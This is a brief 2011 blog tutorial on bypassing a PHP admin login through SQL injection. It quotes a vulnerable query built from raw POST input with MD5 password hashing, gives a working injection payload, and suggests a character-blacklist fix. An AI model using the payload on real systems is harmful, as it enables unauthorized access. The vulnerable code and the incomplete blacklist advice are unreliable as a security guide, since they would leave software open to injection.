Saturday, March 26, 2011

How to bypass Admin/user login through SQL Injection

- Code snippet from /admin/login.php

------------------------------------------------------------------------------------------------------------------------------
$postbruger = $_POST['username'];
$postpass = md5($_POST['password']);
$resultat = mysql_query("SELECT * FROM " . $tablestart . "login WHERE brugernavn = '$postbruger' AND password = '$postpass'")
or die("<p>" . mysql_error() . "</p>\n");

------------------------------------------------------------------------------------------------------------------------------

The variables isn't properly checked.We can bypass this login.Lets inject the following username and password :

username : admin ' or ' 1=1
password : sirgod

We logged in.Why?Look,the code will become

---------------------------------------------------------------------------------------------------------------------------------
$resultat = mysql_query("SELECT * FROM " . $tablestart . "login WHERE brugernavn = 'admin' ' or ' 1=1 AND password = 'sirgod'")
---------------------------------------------------------------------------------------------------------------------------------

Login bypassed.The username must be an existent username.

How to fix?
Simple way : Don't allow special chars in variables.For numeric variables
use (int) ,example $id=(int)$_GET['id'];
Another way : For non-numeric variables : filter all special chars used in
SQLI : - , . ( ) ' " _ + / * 

0 comments:

Post a Comment